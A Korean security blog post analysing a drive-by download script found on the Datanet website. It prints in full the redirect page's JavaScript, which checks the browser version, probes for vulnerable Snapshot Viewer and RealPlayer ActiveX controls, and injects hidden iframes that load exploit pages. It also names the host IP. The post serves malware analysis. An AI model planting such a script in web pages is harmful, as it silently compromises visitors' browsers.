본문 바로가기

[+] Security/[-] Analysis

데이터넷 웹페이지에 심어진 악성코드.

데이터넷에 접속하면 http://203.248.195.23/korea.htm 으로 리다렉션 되는듯 합니다.

korea.htm의 내용을 보면 아래와 같습니다.


<html>
<script>
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=100 height=0 src=yt14.htm></iframe>");
document.write("<iframe width=100 height=0 src=ytfl.htm></iframe>");
if(navigator.userAgent.toLowerCase().indexOf("msie 7")>0)
document.write("<iframe src=ytxxz.htm width=100 height=0></iframe>");
try{var b;
var of=new ActiveXObject("snpvw.Snap"+"shot Viewer Control.1");}
catch(b){};
finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 src=ytff.htm></iframe>");}}
function YuTian222()
{
YuTian = "IERPCtl.IER"+"PCtl.1";
try
{
YiTn = new ActiveXObject(YuTian);
}catch(error){return;}
Tellm = YiTn.PlayerProperty("PRODUCTVE"+"RSION");
if(Tellm<="6.0.14.552")
document.write("<iframe width=100 height=0 src=real.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=yt122121.htm></iframe>");
}
YuTian222();
</script>
</html>

로컬로 접속하면 찝찝하여 백트랙으로 wget으로 긁어 왔습니다.. ㅋㅋㅋ

간단하게 보면 IE버전에 따라 다른htm 파일을 받는군요.

지금 잠깐 강의 시간에 올리는건데 빨리 분석해보고 싶군요.

SIS 카페에서 최초로 신고된듯 합니다.

신고해주신분께 정말 감사.. ㅠㅠ

벌써 몇분이 분석을 하신듯 한데 그분들의 말씀으로는 버전에 따라 다른 htm에서 js 파일을 받는다고 하더군요.

취약성은  Realplayer ActiveX 취약성과 MS08-041 MS Access Snapshot Viewer ActiveX 취약성 이라고 합니다.

취약성은 안다고 해도... 한번쯤 분석해보는게 좋을 듯 싶으니 모두 분석해봅시다 !! ㅋ